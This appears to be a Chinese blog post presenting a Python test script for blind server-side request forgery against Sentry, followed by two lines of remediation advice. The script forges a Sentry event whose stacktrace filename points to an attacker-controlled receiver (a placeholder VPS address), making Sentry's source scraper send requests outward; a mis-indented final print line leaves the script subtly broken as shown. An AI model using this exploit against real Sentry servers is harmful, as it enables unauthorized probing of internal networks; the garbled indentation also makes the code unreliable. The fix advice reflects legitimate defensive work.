Sentry Blind SSRF

 测试脚本:

import requests
import re

def sentry_ssrf():
    s = "https://82fddcba63b6324d8a38de946d1bb468@sentry.xxx.com/12" #sentry地址
    ssrfReceiveAddr = "https://vps.com/receive" #接收ssrf请求地址,可以是你的vps
    key = re.search('https://(.*)@', s) # s如果使用http协议 这里也要换成http
    domain = re.search('@(.*)/', s)
    number = re.search('/(.*)', s[8:])
    url = "https://" + domain.group(1) + "/api/" + number.group(1) + "/store/?sentry_key=" + key.group(1) + "&sentry_version=7"
    datas = {"extra":{"component":"redux/actions/index","action":"RegisterDeviceWeb","serialized":{"code":"INVALID_CREDENTIALS","details":[]}},"fingerprint":["3cbf661c7f723b0a5816c16968fd9493","Non-Error exception captured with keys: code, details, message"],"message":"Non-Error exception captured with keys: code, details, message","stacktrace":{"frames":[{"colno":218121,"filename":ssrfReceiveAddr,"function":"?","lineno":1}]},"exception":{"values":[{"value":"Custom Object","type":"Error"}]},"event_id":"d0513ec5a3544e05aef0d1c7c5b24bae","platform":"javascript","sdk":{"name":"sentry.javascript.browser","packages":[{"name":"npm:@sentry/browser","version":"4.6.4"}],"version":"4.6.4"},"release":"6225dd99","user":{"phash":"996a3f4661e02cb505ae0daf406555e9b914f9d43d635c52cfc7485046862a7f"},"breadcrumbs":[{"timestamp":1554226659.455,"category":"navigation","data":{"from":"/","to":"/login"}}]}
    headers = {'Content-type': 'application/json', 'Origin':'https://xxx.com/'}
    rsp = requests.post(url, json=datas, headers=headers)
print('[*] '+url+' : '+rsp.text)

修复方案:

在sentry的设置中关闭"scrap source code"或" source code scrapping"

保证配置文件中的黑名单不为空:/sentry/conf/server.py

 

posted @ 2020-12-15 11:38  我超怕的  阅读(1454)  评论(0编辑  收藏  举报